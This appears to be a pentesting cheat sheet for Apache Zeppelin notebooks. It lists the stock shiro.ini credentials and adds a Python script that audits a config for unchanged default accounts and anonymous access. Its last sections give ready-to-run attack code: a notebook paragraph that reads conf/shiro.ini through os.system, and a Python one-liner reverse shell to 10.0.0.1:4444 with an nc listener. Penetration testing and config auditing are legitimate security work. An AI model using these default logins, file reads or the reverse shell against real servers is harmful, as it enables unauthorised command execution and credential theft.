Apache Zeppelin Pentesting

Apache Zeppelin is a web-based notebook for interactive, data-driven analytics. Its web UI listens on port 8080 by default.

- [shiro_authentication](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html)

Authentication Config File

conf/shiro.ini (relative to the Zeppelin installation directory; Apache Shiro handles authentication and URL-based authorization)


Default Credentials

The example [users] section of conf/shiro.ini defines each account as `username = password, role, role...`. The stock entries are:

```ini
admin = password1, admin
user1 = password2, role1, role2
user2 = password3, role3
user3 = password4, role2
```
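
The check a defender wants for the two items above: parse the [users] section of conf/shiro.ini, flag any stock account whose password is unchanged, and flag a catch-all `/** = anon` URL rule that exposes notebooks without login. This is an added example, not part of the original page or of Zeppelin itself; the sample config is constructed.

```python
import configparser

# Accounts from the example [users] block in Zeppelin's conf/shiro.ini
DEFAULT_USERS = {"admin": "password1", "user1": "password2",
                 "user2": "password3", "user3": "password4"}

# Constructed sample config (not a real deployment): two stock accounts left
# in place and a catch-all URL rule that lets anonymous users reach notebooks.
SAMPLE_SHIRO_INI = """\
[users]
admin = password1, admin
user1 = password2, role1, role2
analyst = Str0ng-Unique-Pass, role3

[urls]
/api/version = anon
/** = anon
"""

def load_shiro_ini(text):
    """Parse shiro.ini text; keep key case, no %-interpolation, last duplicate wins."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return cp

def parse_users(cp):
    """Map username -> (password, [roles]) from the [users] section."""
    users = {}
    if cp.has_section("users"):
        for name, value in cp.items("users"):
            parts = [p.strip() for p in value.split(",")]
            users[name] = (parts[0], parts[1:])
    return users

def audit_shiro_ini(text):
    """Return findings for stock credentials and anonymous notebook access."""
    cp = load_shiro_ini(text)
    findings = []
    for name, (password, roles) in parse_users(cp).items():
        if DEFAULT_USERS.get(name) == password:
            findings.append(f"stock credential still active for user {name!r} (roles {roles})")
    if cp.has_section("urls") and cp.get("urls", "/**", fallback="").strip() == "anon":
        findings.append("catch-all rule '/** = anon': notebooks reachable without login")
    return findings

if __name__ == "__main__":
    for finding in audit_shiro_ini(SAMPLE_SHIRO_INI):
        print(finding)
```

Run it against a real file with `audit_shiro_ini(open("conf/shiro.ini").read())`; an empty result means no stock account or anonymous catch-all was found.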


RCE in Notebooks

Notebook paragraphs run with the privileges of the Zeppelin process, so anyone who can create or edit a notebook can execute OS commands on the host. Open a notebook and run the following paragraph with the Python interpreter:

```python
%python

import os

# Read the authentication configuration of the running instance
os.system('cat conf/shiro.ini')
```

Reverse Shell

Before running the following paragraph, start a listener such as nc -lvnp 4444 on the local machine.

```python
%python

# 10.0.0.1:4444 is the address of the listener started above
import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```